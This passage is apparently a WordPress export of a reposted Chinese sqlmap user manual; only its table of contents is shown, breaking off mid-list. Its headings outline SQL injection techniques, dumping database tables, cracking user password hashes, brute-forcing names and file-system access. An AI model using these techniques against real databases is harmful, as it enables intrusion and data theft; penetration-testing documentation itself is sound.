{"id":108,"date":"2014-10-19T13:50:20","date_gmt":"2014-10-19T13:50:20","guid":{"rendered":""},"modified":"2014-10-19T13:50:20","modified_gmt":"2014-10-19T13:50:20","slug":"","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=108","title":{"rendered":"[\u8f6c]Sqlmap\u7528\u6237\u624b\u518c"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_17 counter-hierarchy\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" style=\"display: none;\"><i class=\"ez-toc-glyphicon ez-toc-icon-toggle\"><\/i><\/a><\/span><\/div>\n<nav><ul class=\"ez-toc-list ez-toc-list-level-1\"><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%8E%B7%E5%8F%96%E7%9B%AE%E6%A0%87%E6%96%B9%E5%BC%8F\" title=\"\n\t\u83b7\u53d6\u76ee\u6807\u65b9\u5f0f \n\">\n\t\u83b7\u53d6\u76ee\u6807\u65b9\u5f0f \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%9B%AE%E6%A0%87URL\" title=\"\n\t\u76ee\u6807URL \n\">\n\t\u76ee\u6807URL \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8E%E6%96%87%E6%9C%AC%E4%B8%AD%E8%8E%B7%E5%8F%96%E5%A4%9A%E4%B8%AA%E7%9B%AE%E6%A0%87%E6%89%AB%E6%8F%8F\" title=\"\n\t\u4ece\u6587\u672c\u4e2d\u83b7\u53d6\u591a\u4e2a\u76ee\u6807\u626b\u63cf \n\">\n\t\u4ece\u6587\u672c\u4e2d\u83b7\u53d6\u591a\u4e2a\u76ee\u6807\u626b\u63cf \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BB%8E%E6%96%87%E4%BB%B6%E4%B8%AD%E5%8A%A0%E8%BD%BDHTTP%E8%AF%B7%E6%B1%82\" title=\"\n\t\u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7dHTTP\u8bf7\u6c42 
\n\">\n\t\u4ece\u6587\u4ef6\u4e2d\u52a0\u8f7dHTTP\u8bf7\u6c42 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%A4%84%E7%90%86Google%E7%9A%84%E6%90%9C%E7%B4%A2%E7%BB%93%E6%9E%9C\" title=\"\n\t\u5904\u7406Google\u7684\u641c\u7d22\u7ed3\u679c \n\">\n\t\u5904\u7406Google\u7684\u641c\u7d22\u7ed3\u679c \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AF%B7%E6%B1%82\" title=\"\n\t\u8bf7\u6c42 \n\">\n\t\u8bf7\u6c42 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/weizn.net\/?p=108\/#http%E6%95%B0%E6%8D%AE\" title=\"\n\thttp\u6570\u636e \n\">\n\thttp\u6570\u636e \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%8F%82%E6%95%B0%E6%8B%86%E5%88%86%E5%AD%97%E7%AC%A6\" title=\"\n\t\u53c2\u6570\u62c6\u5206\u5b57\u7b26 \n\">\n\t\u53c2\u6570\u62c6\u5206\u5b57\u7b26 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP_cookie%E5%A4%B4\" title=\"\n\tHTTP&nbsp;cookie\u5934 \n\">\n\tHTTP&nbsp;cookie\u5934 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-10\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP_User-Agent%E5%A4%B4\" title=\"\n\tHTTP&nbsp;User-Agent\u5934 \n\">\n\tHTTP&nbsp;User-Agent\u5934 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-11\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP_Referer%E5%A4%B4\" title=\"\n\tHTTP&nbsp;Referer\u5934 \n\">\n\tHTTP&nbsp;Referer\u5934 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-12\" 
href=\"http:\/\/weizn.net\/?p=108\/#%E9%A2%9D%E5%A4%96%E7%9A%84HTTP%E5%A4%B4\" title=\"\n\t\u989d\u5916\u7684HTTP\u5934 \n\">\n\t\u989d\u5916\u7684HTTP\u5934 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-13\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP%E8%AE%A4%E8%AF%81%E4%BF%9D%E6%8A%A4\" title=\"\n\tHTTP\u8ba4\u8bc1\u4fdd\u62a4 \n\">\n\tHTTP\u8ba4\u8bc1\u4fdd\u62a4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-14\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP%E5%8D%8F%E8%AE%AE%E7%9A%84%E8%AF%81%E4%B9%A6%E8%AE%A4%E8%AF%81\" title=\"\n\tHTTP\u534f\u8bae\u7684\u8bc1\u4e66\u8ba4\u8bc1 \n\">\n\tHTTP\u534f\u8bae\u7684\u8bc1\u4e66\u8ba4\u8bc1 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-15\" href=\"http:\/\/weizn.net\/?p=108\/#HTTPS%E4%BB%A3%E7%90%86\" title=\"\n\tHTTP(S)\u4ee3\u7406 \n\">\n\tHTTP(S)\u4ee3\u7406 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-16\" href=\"http:\/\/weizn.net\/?p=108\/#HTTP%E8%AF%B7%E6%B1%82%E5%BB%B6%E8%BF%9F\" title=\"\n\tHTTP\u8bf7\u6c42\u5ef6\u8fdf \n\">\n\tHTTP\u8bf7\u6c42\u5ef6\u8fdf \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-17\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E8%B6%85%E6%97%B6%E6%97%B6%E9%97%B4\" title=\"\n\t\u8bbe\u5b9a\u8d85\u65f6\u65f6\u95f4 \n\">\n\t\u8bbe\u5b9a\u8d85\u65f6\u65f6\u95f4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-18\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E9%87%8D%E8%AF%95%E8%B6%85%E6%97%B6\" title=\"\n\t\u8bbe\u5b9a\u91cd\u8bd5\u8d85\u65f6 \n\">\n\t\u8bbe\u5b9a\u91cd\u8bd5\u8d85\u65f6 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-19\" 
href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E9%9A%8F%E6%9C%BA%E6%94%B9%E5%8F%98%E7%9A%84%E5%8F%82%E6%95%B0%E5%80%BC\" title=\"\n\t\u8bbe\u5b9a\u968f\u673a\u6539\u53d8\u7684\u53c2\u6570\u503c \n\">\n\t\u8bbe\u5b9a\u968f\u673a\u6539\u53d8\u7684\u53c2\u6570\u503c \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-20\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%A9%E7%94%A8%E6%AD%A3%E5%88%99%E8%BF%87%E6%BB%A4%E7%9B%AE%E6%A0%87%E7%BD%91%E5%9D%80\" title=\"\n\t\u5229\u7528\u6b63\u5219\u8fc7\u6ee4\u76ee\u6807\u7f51\u5740 \n\">\n\t\u5229\u7528\u6b63\u5219\u8fc7\u6ee4\u76ee\u6807\u7f51\u5740 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-21\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%81%BF%E5%85%8D%E8%BF%87%E5%A4%9A%E7%9A%84%E9%94%99%E8%AF%AF%E8%AF%B7%E6%B1%82%E8%A2%AB%E5%B1%8F%E8%94%BD\" title=\"\n\t\u907f\u514d\u8fc7\u591a\u7684\u9519\u8bef\u8bf7\u6c42\u88ab\u5c4f\u853d \n\">\n\t\u907f\u514d\u8fc7\u591a\u7684\u9519\u8bef\u8bf7\u6c42\u88ab\u5c4f\u853d \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-22\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%85%B3%E6%8E%89URL%E5%8F%82%E6%95%B0%E5%80%BC%E7%BC%96%E7%A0%81\" title=\"\n\t\u5173\u6389URL\u53c2\u6570\u503c\u7f16\u7801 \n\">\n\t\u5173\u6389URL\u53c2\u6570\u503c\u7f16\u7801 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-23\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%AF%8F%E6%AC%A1%E8%AF%B7%E6%B1%82%E6%97%B6%E5%80%99%E6%89%A7%E8%A1%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E7%9A%84python%E4%BB%A3%E7%A0%81\" title=\"\n\t\u6bcf\u6b21\u8bf7\u6c42\u65f6\u5019\u6267\u884c\u81ea\u5b9a\u4e49\u7684python\u4ee3\u7801 \n\">\n\t\u6bcf\u6b21\u8bf7\u6c42\u65f6\u5019\u6267\u884c\u81ea\u5b9a\u4e49\u7684python\u4ee3\u7801 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-24\" 
href=\"http:\/\/weizn.net\/?p=108\/#%E6%B3%A8%E5%85%A5\" title=\"\n\t\u6ce8\u5165 \n\">\n\t\u6ce8\u5165 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-25\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B5%8B%E8%AF%95%E5%8F%82%E6%95%B0\" title=\"\n\t\u6d4b\u8bd5\u53c2\u6570 \n\">\n\t\u6d4b\u8bd5\u53c2\u6570 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-26\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93\" title=\"\n\t\u6307\u5b9a\u6570\u636e\u5e93 \n\">\n\t\u6307\u5b9a\u6570\u636e\u5e93 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-27\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8C%87%E5%AE%9A%E6%95%B0%E6%8D%AE%E5%BA%93%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%B3%BB%E7%BB%9F\" title=\"\n\t\u6307\u5b9a\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf \n\">\n\t\u6307\u5b9a\u6570\u636e\u5e93\u670d\u52a1\u5668\u7cfb\u7edf \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-28\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8C%87%E5%AE%9A%E6%97%A0%E6%95%88%E7%9A%84%E5%A4%A7%E6%95%B0%E5%AD%97\" title=\"\n\t\u6307\u5b9a\u65e0\u6548\u7684\u5927\u6570\u5b57 \n\">\n\t\u6307\u5b9a\u65e0\u6548\u7684\u5927\u6570\u5b57 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-29\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%8F%AA%E5%AE%9A%E6%97%A0%E6%95%88%E7%9A%84%E9%80%BB%E8%BE%91\" title=\"\n\t\u53ea\u5b9a\u65e0\u6548\u7684\u903b\u8f91 \n\">\n\t\u53ea\u5b9a\u65e0\u6548\u7684\u903b\u8f91 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-30\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B3%A8%E5%85%A5payload\" title=\"\n\t\u6ce8\u5165payload \n\">\n\t\u6ce8\u5165payload \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link 
ez-toc-heading-31\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BF%AE%E6%94%B9%E6%B3%A8%E5%85%A5%E7%9A%84%E6%95%B0%E6%8D%AE\" title=\"\n\t\u4fee\u6539\u6ce8\u5165\u7684\u6570\u636e \n\">\n\t\u4fee\u6539\u6ce8\u5165\u7684\u6570\u636e \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-32\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8E%A2%E6%B5%8B\" title=\"\n\t\u63a2\u6d4b \n\">\n\t\u63a2\u6d4b \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-33\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%8E%A2%E6%B5%8B%E7%AD%89%E7%BA%A7\" title=\"\n\t\u63a2\u6d4b\u7b49\u7ea7 \n\">\n\t\u63a2\u6d4b\u7b49\u7ea7 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-34\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%A3%8E%E9%99%A9%E7%AD%89%E7%BA%A7\" title=\"\n\t\u98ce\u9669\u7b49\u7ea7 \n\">\n\t\u98ce\u9669\u7b49\u7ea7 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-35\" href=\"http:\/\/weizn.net\/?p=108\/#%E9%A1%B5%E9%9D%A2%E6%AF%94%E8%BE%83\" title=\"\n\t\u9875\u9762\u6bd4\u8f83 \n\">\n\t\u9875\u9762\u6bd4\u8f83 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-36\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B3%A8%E5%85%A5%E6%8A%80%E6%9C%AF\" title=\"\n\t\u6ce8\u5165\u6280\u672f \n\">\n\t\u6ce8\u5165\u6280\u672f \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-37\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%B5%8B%E8%AF%95%E6%98%AF%E5%90%A6%E6%98%AF%E6%B3%A8%E5%85%A5\" title=\"\n\t\u6d4b\u8bd5\u662f\u5426\u662f\u6ce8\u5165 \n\">\n\t\u6d4b\u8bd5\u662f\u5426\u662f\u6ce8\u5165 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-38\" 
href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9A%E5%BB%B6%E8%BF%9F%E6%B3%A8%E5%85%A5%E7%9A%84%E6%97%B6%E9%97%B4\" title=\"\n\t\u8bbe\u5b9a\u5ef6\u8fdf\u6ce8\u5165\u7684\u65f6\u95f4 \n\">\n\t\u8bbe\u5b9a\u5ef6\u8fdf\u6ce8\u5165\u7684\u65f6\u95f4 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-39\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9AUNION%E6%9F%A5%E8%AF%A2%E5%AD%97%E6%AE%B5%E6%95%B0\" title=\"\n\t\u8bbe\u5b9aUNION\u67e5\u8be2\u5b57\u6bb5\u6570 \n\">\n\t\u8bbe\u5b9aUNION\u67e5\u8be2\u5b57\u6bb5\u6570 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-40\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%AE%BE%E5%AE%9AUNION%E6%9F%A5%E8%AF%A2%E4%BD%BF%E7%94%A8%E7%9A%84%E5%AD%97%E7%AC%A6\" title=\"\n\t\u8bbe\u5b9aUNION\u67e5\u8be2\u4f7f\u7528\u7684\u5b57\u7b26 \n\">\n\t\u8bbe\u5b9aUNION\u67e5\u8be2\u4f7f\u7528\u7684\u5b57\u7b26 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-41\" href=\"http:\/\/weizn.net\/?p=108\/#%E4%BA%8C%E9%98%B6SQL%E6%B3%A8%E5%85%A5\" title=\"\n\t\u4e8c\u9636SQL\u6ce8\u5165 \n\">\n\t\u4e8c\u9636SQL\u6ce8\u5165 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-42\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E6%95%B0%E6%8D%AE\" title=\"\n\t\u5217\u6570\u636e \n\">\n\t\u5217\u6570\u636e \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-43\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%A0%87%E5%BF%97\" title=\"\n\t\u6807\u5fd7 \n\">\n\t\u6807\u5fd7 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-44\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%94%A8%E6%88%B7\" title=\"\n\t\u7528\u6237 \n\">\n\t\u7528\u6237 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link 
ez-toc-heading-45\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%BD%93%E5%89%8D%E6%95%B0%E6%8D%AE%E5%BA%93\" title=\"\n\t\u5f53\u524d\u6570\u636e\u5e93 \n\">\n\t\u5f53\u524d\u6570\u636e\u5e93 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-46\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%BD%93%E5%89%8D%E7%94%A8%E6%88%B7%E6%98%AF%E5%90%A6%E4%B8%BA%E7%AE%A1%E7%90%86%E7%94%A8\" title=\"\n\t\u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\u7528 \n\">\n\t\u5f53\u524d\u7528\u6237\u662f\u5426\u4e3a\u7ba1\u7406\u7528 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-47\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E7%94%A8%E6%88%B7\" title=\"\n\t\u5217\u6570\u636e\u5e93\u7ba1\u7406\u7528\u6237 \n\">\n\t\u5217\u6570\u636e\u5e93\u7ba1\u7406\u7528\u6237 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-48\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E5%87%BA%E5%B9%B6%E7%A0%B4%E8%A7%A3%E6%95%B0%E6%8D%AE%E5%BA%93%E7%94%A8%E6%88%B7%E7%9A%84hash\" title=\"\n\t\u5217\u51fa\u5e76\u7834\u89e3\u6570\u636e\u5e93\u7528\u6237\u7684hash \n\">\n\t\u5217\u51fa\u5e76\u7834\u89e3\u6570\u636e\u5e93\u7528\u6237\u7684hash \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-49\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E5%91%98%E6%9D%83%E9%99%90\" title=\"\n\t\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u6743\u9650 \n\">\n\t\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u6743\u9650 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-50\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AE%A1%E7%90%86%E5%91%98%E8%A7%92%E8%89%B2\" 
title=\"\n\t\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u89d2\u8272 \n\">\n\t\u5217\u51fa\u6570\u636e\u5e93\u7ba1\u7406\u5458\u89d2\u8272 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-51\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E5%87%BA%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93\" title=\"\n\t\u5217\u51fa\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u6570\u636e\u5e93 \n\">\n\t\u5217\u51fa\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u6570\u636e\u5e93 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-52\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8\" title=\"\n\t\u5217\u4e3e\u6570\u636e\u5e93\u8868 \n\">\n\t\u5217\u4e3e\u6570\u636e\u5e93\u8868 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-53\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E4%B8%AD%E7%9A%84%E5%AD%97%E6%AE%B5\" title=\"\n\t\u5217\u4e3e\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5 \n\">\n\t\u5217\u4e3e\u6570\u636e\u5e93\u8868\u4e2d\u7684\u5b57\u6bb5 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-54\" href=\"http:\/\/weizn.net\/?p=108\/#%E5%88%97%E4%B8%BE%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B3%BB%E7%BB%9F%E7%9A%84%E6%9E%B6%E6%9E%84\" title=\"\n\t\u5217\u4e3e\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u67b6\u6784 \n\">\n\t\u5217\u4e3e\u6570\u636e\u5e93\u7cfb\u7edf\u7684\u67b6\u6784 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-55\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%8E%B7%E5%8F%96%E8%A1%A8%E4%B8%AD%E6%95%B0%E6%8D%AE%E4%B8%AA%E6%95%B0\" title=\"\n\t\u83b7\u53d6\u8868\u4e2d\u6570\u636e\u4e2a\u6570 \n\">\n\t\u83b7\u53d6\u8868\u4e2d\u6570\u636e\u4e2a\u6570 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a 
class=\"ez-toc-link ez-toc-heading-56\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%8E%B7%E5%8F%96%E6%95%B4%E4%B8%AA%E8%A1%A8%E7%9A%84%E6%95%B0%E6%8D%AE\" title=\"\n\t\u83b7\u53d6\u6574\u4e2a\u8868\u7684\u6570\u636e \n\">\n\t\u83b7\u53d6\u6574\u4e2a\u8868\u7684\u6570\u636e \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-57\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%8E%B7%E5%8F%96%E6%89%80%E6%9C%89%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8%E7%9A%84%E5%86%85%E5%AE%B9\" title=\"\n\t\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9 \n\">\n\t\u83b7\u53d6\u6240\u6709\u6570\u636e\u5e93\u8868\u7684\u5185\u5bb9 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-58\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%90%9C%E7%B4%A2%E5%AD%97%E6%AE%B5%EF%BC%8C%E8%A1%A8%EF%BC%8C%E6%95%B0%E6%8D%AE%E5%BA%93\" title=\"\n\t\u641c\u7d22\u5b57\u6bb5\uff0c\u8868\uff0c\u6570\u636e\u5e93 \n\">\n\t\u641c\u7d22\u5b57\u6bb5\uff0c\u8868\uff0c\u6570\u636e\u5e93 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-59\" href=\"http:\/\/weizn.net\/?p=108\/#%E8%BF%90%E8%A1%8C%E8%87%AA%E5%AE%9A%E4%B9%89%E7%9A%84SQL%E8%AF%AD%E5%8F%A5\" title=\"\n\t\u8fd0\u884c\u81ea\u5b9a\u4e49\u7684SQL\u8bed\u53e5 \n\">\n\t\u8fd0\u884c\u81ea\u5b9a\u4e49\u7684SQL\u8bed\u53e5 \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-60\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%88%86%E7%A0%B4\" title=\"\n\t\u7206\u7834 \n\">\n\t\u7206\u7834 \n<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-61\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E8%A1%A8%E5%90%8D\" title=\"\n\t\u66b4\u529b\u7834\u89e3\u8868\u540d \n\">\n\t\u66b4\u529b\u7834\u89e3\u8868\u540d \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a 
class=\"ez-toc-link ez-toc-heading-62\" href=\"http:\/\/weizn.net\/?p=108\/#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E5%88%97%E5%90%8D\" title=\"\n\t\u66b4\u529b\u7834\u89e3\u5217\u540d \n\">\n\t\u66b4\u529b\u7834\u89e3\u5217\u540d \n<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-63\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%94%A8%E6%88%B7%E8%87%AA%E5%AE%9A%E4%B9%89%E5%87%BD%E6%95%B0%E6%B3%A8%E5%85%A5\" title=\"\n\t\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165 \n\">\n\t\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165 \n<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-64\" href=\"http:\/\/weizn.net\/?p=108\/#%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C\" title=\"\n\t\u7cfb\u7edf\u6587\u4ef6\u64cd\u4f5c \n\">\n\t\u7cfb\u7edf\u6587\u4ef6\u64cd\u4f5c \n<\/a><ul 